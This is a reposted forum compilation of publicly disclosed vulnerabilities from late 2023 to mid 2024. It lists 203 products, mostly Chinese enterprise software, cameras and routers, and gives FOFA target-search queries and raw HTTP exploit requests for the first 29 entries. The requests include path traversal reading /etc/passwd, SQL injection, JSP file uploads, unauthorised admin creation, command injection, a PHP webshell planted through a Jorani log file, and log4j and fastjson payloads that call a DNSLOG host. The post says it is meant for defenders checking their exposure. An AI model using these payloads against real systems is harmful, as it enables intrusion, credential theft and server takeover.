Compilation of publicly disclosed Internet vulnerabilities 202309-202406 (repost)

Views: 2678 | Replies: 0
Posted 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities 202309-202406
道一安全, 2024-06-05 07:41, Beijing
The following article is from 网络安全新视界, author 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive engagements; we hope this article helps with defence. Defenders can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Patches: all vulnerabilities listed are public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long have been replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's lawful rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is already the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow our public account (网络安全新视界).
Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 (Dahua) ICC intelligent IoT integrated management platform arbitrary file read
21. 大华 (Dahua) ICC intelligent IoT integrated management platform random remote code execution
22. 大华 (Dahua) ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华 (Dahua) ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 (Yonyou) NC registerServlet JNDI remote code execution
26. 用友 (Yonyou) NC linkVoucher SQL injection
27. 用友 (Yonyou) NC showcontent SQL injection
28. 用友 (Yonyou) NC grouptemplet arbitrary file upload
29. 用友 (Yonyou) NC down/bill SQL injection
30. 用友 (Yonyou) NC importPml SQL injection
31. 用友 (Yonyou) NC runStateServlet SQL injection
32. 用友 (Yonyou) NC complainbilldetail SQL injection
33. 用友 (Yonyou) NC downTax/download SQL injection
34. 用友 (Yonyou) NC warningDetailInfo endpoint SQL injection
35. 用友 (Yonyou) NC-Cloud importhttpscer arbitrary file upload
36. 用友 (Yonyou) NC-Cloud soapFormat XXE
37. 用友 (Yonyou) NC-Cloud IUpdateService XXE
38. 用友 (Yonyou) U8 Cloud smartweb2.RPC.d XXE
39. 用友 (Yonyou) U8 Cloud RegisterServlet SQL injection
40. 用友 (Yonyou) U8-Cloud XChangeServlet XXE
41. 用友 (Yonyou) U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 (Yonyou) GRP-U8 SmartUpload01 file upload
43. 用友 (Yonyou) GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 (Yonyou) GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 (Yonyou) GRP-U8 ufgovbank XXE
46. 用友 (Yonyou) GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 (Yonyou) GRP A++Cloud government finance cloud arbitrary file read
48. 用友 (Yonyou) U8 CRM swfupload arbitrary file upload
49. 用友 (Yonyou) U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
55. 畅捷通 (Chanjet) T+ getdecallusers information disclosure
56. 畅捷通 (Chanjet) T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 (Chanjet) T+ keyEdit.aspx SQL injection
58. 畅捷通 (Chanjet) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 (Wanhu) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 (Wanhu) ezOFFICE wpsservlet arbitrary file upload
68. 万户 (Wanhu) ezOFFICE wf_printnum.jsp SQL injection
69. 万户 (Wanhu) ezOFFICE contract_gd.jsp SQL injection
70. 万户 (Wanhu) ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 garment management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
81. 宇视 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 (Hikvision) operations management center session command execution
93. 奇安信 (Qi An Xin) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 (Qi An Xin) 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin user creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 (Glodon) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 project management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload endpoint file upload
200. SeaCMS 海洋 video management system dmku SQL injection
201. 方正 (Founder) all-media news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload
POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the admin backend with the default account admin, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x


The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request, which executes the function and uses base64 encoding.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Send the following request to the lab target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华 (Dahua) ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. 大华 (Dahua) ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. 大华 (Dahua) ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华 (Dahua) ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
